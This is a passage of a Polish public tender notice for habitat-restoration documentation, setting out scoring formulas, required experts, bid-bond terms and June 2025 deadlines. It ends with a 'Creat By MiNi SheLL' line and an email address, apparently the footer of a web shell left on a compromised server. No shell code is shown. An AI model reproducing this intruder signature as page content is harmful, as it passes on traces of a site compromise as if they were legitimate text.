punktów w zakresie kryterium „cena oferty” wyznaczana będzie ze wzoru:<br/><br/>Cena oferty najniższej <br/> C = --------------------------------- x 100 x W (W – waga kryterium 60 %) <br/>Cena oferty badanej <br/> <br/>Liczba punktów wyliczana (w danym kryterium) z ww. wzoru będzie zaokrąglana do dwóch miejsc po przecinku wg zasad matematycznych, tj. wartości równe lub wyższe od 5 – w górę, a poniżej 5 – w dół.<br/>Maksymalnie za to kryterium zamawiający może przyznać 60 pkt.<br/>2)	Liczba punktów w zakresie kryterium „doświadczenie osób skierowanych do realizacji zamówienia, tj. herpetologa, ichtiologa,<br/>ornitologa i hydrobiologa” będzie wyznaczona wg opisu zawartego w rozdz. XIII ust. 2 pkt 2 SWZ (z uwagi na ograniczona liczbę<br/>znaków Zamawiający odsyła do opisu w SWZ).<br/>Maksymalnie za to kryterium zamawiający może przyznać łącznie 40 pkt.<br/><br/>3) Ostateczny ranking ofert wyliczony zostanie według wzoru C + D gdzie:<br/>C – liczba punktów uzyskana w kryterium cena oferty,<br/>D – liczba punktów uzyskana w kryterium doświadczenie osób skierowanych do realizacji zamówienia., tj. herpetologa, ichtiologa,<br/>ornitologa, hydrobiologa i hydrologa.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie osób skierowanych do realizacji zamówienia, tj. herpetologa, ichtiologa, ornitologa, hydrobiologa i hydrologa</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/><br/>1)	zdolności do występowania w obrocie gospodarczym.<br/><br/>Zamawiający nie określa warunku w ww. zakresie.<br/><br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/><br/>Zamawiający nie określa warunku w ww. zakresie.<br/><br/>3)	sytuacji ekonomicznej lub finansowej.<br/><br/>Zamawiający nie określa warunku w ww. zakresie.<br/><br/>4)	zdolności technicznej lub zawodowej. <br/><br/>Opis sposobu dokonywania oceny spełniania tego warunku:<br/><br/>a)	Zamawiający określa, że ww. warunek zostanie spełniony, jeśli wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie), wykonał (a w przypadku świadczeń okresowych lub ciągłych nadal wykonuje) należycie co najmniej dwie usługi, z których każda:<br/><br/>- dot. opracowania/wykonania:<br/>	dokumentów obejmujących swoim zakresem monitoring siedlisk i gatunków chronionych, lub<br/>	dokumentów obejmujących swoim zakresem wykonanie inwentaryzacji przyrodniczej , lub<br/>	Karty Informacyjnej Przedsięwzięcia , <br/>-miała wartość minimum 20 000,00 złotych brutto<br/><br/>b)	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują lub będą dysponować w okresie wykonywania zamówienia i skierują do jego realizacji:<br/><br/>Lp.	Pełniona funkcja przy realizacji zamówienia<br/>(minimalna liczba osób)	Wymagane wykształcenie – minimalne wymagania	Wymagane Doświadczenie - minimalne wymagania<br/><br/>1	<br/>ekspert herpetolog<br/>(min. 1 osoba)	Posiada co najmniej dyplom studiów I stopnia (studia licencjackie lub inżynierskie) z zakresu biologia lub ochrona środowiska lub ekologia lub inżynieria środowiska	jest autorem lub współautorem minimum dwóch publikacji/dokumentów/ekspertyz <br/>w zakresie których były inwentaryzacje herpetologiczne lub badania herpetologiczne lub informacje z zakresu ochrony płazów i gadów<br/>2	<br/>ekspert ichtiolog<br/>(min. 1 osoba)	Posiada co najmniej dyplom studiów I stopnia (studia licencjackie lub inżynierskie) z zakresu biologia lub ochrona środowiska lub ekologia lub inżynieria środowiska lub rybactwo	jest autorem lub współautorem minimum dwóch publikacji/dokumentów/ekspertyz <br/>w zakresie których były inwentaryzacje ichtiologiczne lub badania ichtiologiczne lub informacje z zakresu ochrony ichtiofauny.<br/>3	<br/>ekspert ornitolog<br/>(min. 1 osoba)	Posiada co najmniej dyplom studiów I stopnia (studia licencjackie lub inżynierskie) z zakresu biologia lub ochrona środowiska lub ekologia lub inżynieria środowiska	jest autorem lub współautorem minimum dwóch publikacji/dokumentów/ekspertyz <br/>w zakresie których były inwentaryzacje ornitologiczne lub badania ornitologiczne lub informacje z zakresu ochrony awifauny.<br/>4	<br/>ekspert hydrobiolog<br/>(min. 1 osoba)	Posiada co najmniej dyplom studiów I stopnia (studia licencjackie lub inżynierskie) z zakresu biologia lub ochrona środowiska lub ekologia lub inżynieria środowiska	jest autorem lub współautorem minimum dwóch publikacji/dokumentów/ekspertyz <br/>w zakresie których były inwentaryzacje hydrobiologiczne lub badania siedlisk wodnych lub informacje z zakresu ochrony siedlisk wodnych.<br/>5	<br/>ekspert hydrolog<br/>(min. 1 osoba)	Posiada co najmniej dyplom studiów I stopnia (studia licencjackie lub inżynierskie) z zakresu biologia lub biotechnologia lub ochrona środowiska lub ekologia lub inżynieria środowiska	jest autorem lub współautorem minimum dwóch publikacji/dokumentów/ekspertyz <br/>w zakresie których były inwentaryzacje hydrologiczne lub badania hydrologiczne lub informacje z zakresu wpływu inwestycji na warunki wodne danego terenu<br/>6	<br/>ekspert bentolog<br/>(min. 1 osoba)	Posiada co najmniej dyplom studiów I stopnia (studia licencjackie lub inżynierskie) z zakresu biologia lub biotechnologia lub ochrona środowiska lub ekologia lub inżynieria środowiska	jest autorem lub współautorem minimum dwóch publikacji/dokumentów/ekspertyz <br/>w zakresie których były inwentaryzacje bentologiczne lub badania bentologiczne lub informacje z zakresu ochrony fauny dennej<br/>7	<br/>ekspert specjalizujący się w inwazyjnych gatunkach obcych roślin wodnych (min. 1 osoba)	Posiada co najmniej dyplom studiów I stopnia (studia licencjackie lub inżynierskie) z zakresu biologia lub biotechnologia lub ochrona środowiska lub ekologia lub inżynieria środowiska	jest autorem lub współautorem minimum dwóch publikacji/dokumentów/ekspertyz w zakresie których były inwentaryzacje inwazyjnych gatunków roślin wodnych lub badania wpływu inwazyjnych gatunków obcych roślin wodnych na siedliska lub ekosystemy lub informacje z zakresu kontroli lub zwalczania inwazyjnych gatunków obcych roślin wodnych <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga złożenia przez Wykonawcę podmiotowych środków dowodowych w tym zakresie</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	wykaz usług wykonanych (sporządzony zgodnie ze wzorem stanowiącym Załącznik Nr 3 do SWZ), a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy; (w odniesieniu do warunku określonego w rozdz. V ust. 1 pkt 4 lit. a) SWZ).<br/>2)	wykaz osób (sporządzony zgodnie ze wzorem stanowiącym Załącznik Nr 4 do SWZ), skierowanych przez wykonawcę do realizacji zamówienia publicznego odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją <br/>o podstawie do dysponowania tymi osobami (w odniesieniu do warunku określonego w rozdz. V ust. 1 pkt 4 lit. b) SWZ).</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca jest zobowiązany wnieść wadium w wysokości: 2 000,00 zł (słownie: dwa tysiące zł 00/100).<br/>2.	Wadium może być wniesione w jednej lub kilku następujących formach:<br/>a)	pieniądzu;<br/>b)	gwarancjach bankowych;<br/>c)	gwarancjach ubezpieczeniowych;<br/>d)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy <br/>z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>3.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek bankowy Zamawiającego (Bank Gospodarstwa Krajowego) Nr konta::<br/><br/>87 1130 1222 0030 2047 8690 0001<br/><br/>z adnotacją w tytule: „Wadium – Opracowanie Kart Informacyjnych Przedsięwzięcia (KIP) oraz opracowanie pozostałej niezbędnej dokumentacji na potrzeby realizacji prac odtwarzania siedlisk wodnych w ramach realizowanego projektu” <br/>4.	Za skuteczne wniesienie wadium w pieniądzu, Zamawiający uzna wadium, które zostanie zaksięgowane na rachunku bankowym Zamawiającego przed upływem terminu składania ofert.<br/>5.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej – przed upływem terminu składania ofert.<br/>6.	W przypadku wnoszenia wadium w formie gwarancji bankowej lub ubezpieczeniowej, lub poręczenia gwarancja lub poręczenie musi być nieodwołalne, bezwarunkowe i płatne na pierwsze pisemne żądanie Zamawiającego, sporządzone zgodnie z obowiązującymi przepisami i powinna zawierać następujące elementy:<br/>a)	nazwę: dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta lub poręczyciela oraz wskazanie ich siedzib,<br/>b)	kwotę wadium,<br/>c)	termin ważności gwarancji/poręczenia w formule: „od dnia …….– do dnia ……………….”<br/>d)	zobowiązanie gwaranta/poręczyciela do zapłacenia kwoty wskazanej w gwarancji /poręczeniu na pierwsze żądanie Zamawiającego w sytuacjach zatrzymania wadium określonych w przepisach ustawy.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 ustawy) Zamawiający wymaga, aby poręczenie lub gwarancja obejmowała swą treścią wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia (tj. zobowiązanych z tytułu poręczenia lub gwarancji) lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. konsorcjum).<br/>7.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy.<br/>8.	Zasady dokonywania zatrzymania i zwrotu wadium określono w przepisach art. 98 ustawy. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Oświadczenia Wykonawcy stanowiące wstępne potwierdzenie o niepodleganiu wykluczeniu oraz wstępne potwierdzenie o<br/>spełnianiu warunków udziału w postępowaniu w zakresie wskazanym w rozdz. V SWZ sporządzone zgodnie ze wzorem<br/>stanowiącym Załącznik Nr 2 do SWZ przy czym oświadczenie to składają odrębnie i. wykonawca/każdy spośród wykonawców wspólnie ubiegających się o udzielenie zamówienia. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu lub kryteriów selekcji w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu lub kryteriów selekcji Oświadczenie wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia (jeżeli dotyczy):<br/>a) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia wykazując warunek udziału w postępowaniu mogą polegać na<br/>zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są<br/>wymagane.<br/>b) w przypadku, o którym mowa w pkt a) wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/>Oświadczenie należy złożyć wg wymogów załącznika Nr 7 do SWZ. Oświadczenie to jest podmiotowym środkiem dowodowym. Ponadto wykonawcy wspólnie ubiegających się o udzielenie zamówienia zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o których mowa w rozdz. VI ust. 2 SWZ, przy czym podmiotowe środki dowodowe, o których mowa:<br/>- w rozdz. VI ust. 2 pkt 1 i pkt 2 SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą spełnienie<br/>warunku <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści tej umowy, określa projekt umowy, stanowiący załącznik Nr 5 do SWZ.<br/>2. Zamawiający przewiduje możliwości wprowadzenia zmian do zawartej umowy, na podstawie art. 454-455 ustawy oraz postanowień Projektu Umowy, stanowiącego załącznik Nr 5 do SWZ (możliwości wprowadzenia zmian określona została w § 13 Projektu Umowy). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-18 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi załącznikami należy złożyć na platformie (pod adresem https://pnujsciewarty.ezamawiajacy.pl)</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-18 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-07-17</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> UWAGA: Wykonawca podlega wykluczeniu także w oparciu o podstawy wykluczenia wskazane w art. 7 ustawy z dnia 13<br/>kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących<br/>ochronie bezpieczeństwa narodowego.

Creat By MiNi SheLL
Email: jattceo@gmail.com